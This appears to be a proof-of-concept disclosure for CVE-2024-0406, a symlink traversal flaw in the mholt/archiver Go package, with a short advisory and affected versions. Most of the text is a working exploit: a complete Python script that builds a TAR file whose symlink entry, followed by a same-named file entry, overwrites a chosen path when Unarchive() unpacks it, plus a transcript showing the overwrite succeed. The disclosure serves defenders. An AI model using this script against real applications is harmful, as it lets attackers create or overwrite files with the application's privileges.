A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted TAR file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the creation or overwriting of files with the user's or application's privileges using the library.
Affected versions: >=3.0.0 <= 3.5.1
PoC || GTFO
» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_session
# Upload file to target which use Unarchive() function
root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun 1 08:20 .
drwxr-xr-x 3 root root 4096 Jun 1 07:02 ..
lrwxrwxrwx 1 root root 32 Jun 1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>
import tarfile
import sys
import io
def create_tar(tar_path, symlink_target):
with tarfile.open(tar_path, 'w') as tar:
# Create a symlink entry './x' pointing to symlink_target
symlink_info = tarfile.TarInfo(name='./x')
symlink_info.type = tarfile.SYMTYPE
symlink_info.linkname = symlink_target
tar.addfile(symlink_info)
# Optional: Add a file with the same name 'x'
payload_content = b'<some-file-content-here>'
payload_info = tarfile.TarInfo(name='x')
payload_info.size = len(payload_content)
tar.addfile(payload_info, io.BytesIO(payload_content))
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <path_to_symlink>")
sys.exit(1)
symlink_target = sys.argv[1]
tar_path = "cve-2024-0406.tar"
create_tar(tar_path, symlink_target)
print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")